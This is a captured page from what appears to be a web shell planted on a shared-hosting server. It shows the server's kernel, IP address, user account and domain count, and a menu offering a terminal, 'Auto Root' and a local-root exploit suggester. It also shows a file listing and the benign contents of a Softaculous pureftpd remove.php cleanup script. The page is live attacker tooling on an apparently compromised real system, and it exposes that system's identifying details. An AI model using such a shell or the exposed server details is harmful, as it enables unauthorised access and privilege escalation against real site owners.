Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
apps /
pureftpd /
3 /
Delete
Unzip
Name
Size
Permission
Date
Action
install.php
2.09
KB
-rw-r--r--
2025-07-28 07:34
remove.php
421
B
-rw-r--r--
2021-12-24 10:19
update.php
1.23
KB
-rw-r--r--
2025-10-06 10:01
Save
Rename
<?php /* function __pureftpd_preremove(){ } function __pureftpd_remove(){ } */ function __pureftpd_postremove(){ global $webuzo, $distro, $globals; $distro = $globals['WU_DISTRO']; // Remove library_path file from /etc/ld.so.conf.d/ if($distro == 'ubuntu'){ if(file_exists('/etc/ld.so.conf.d/pureftpd_path.conf')){ unlink('/etc/ld.so.conf.d/pureftpd_path.conf'); } vexec('ldconfig'); } }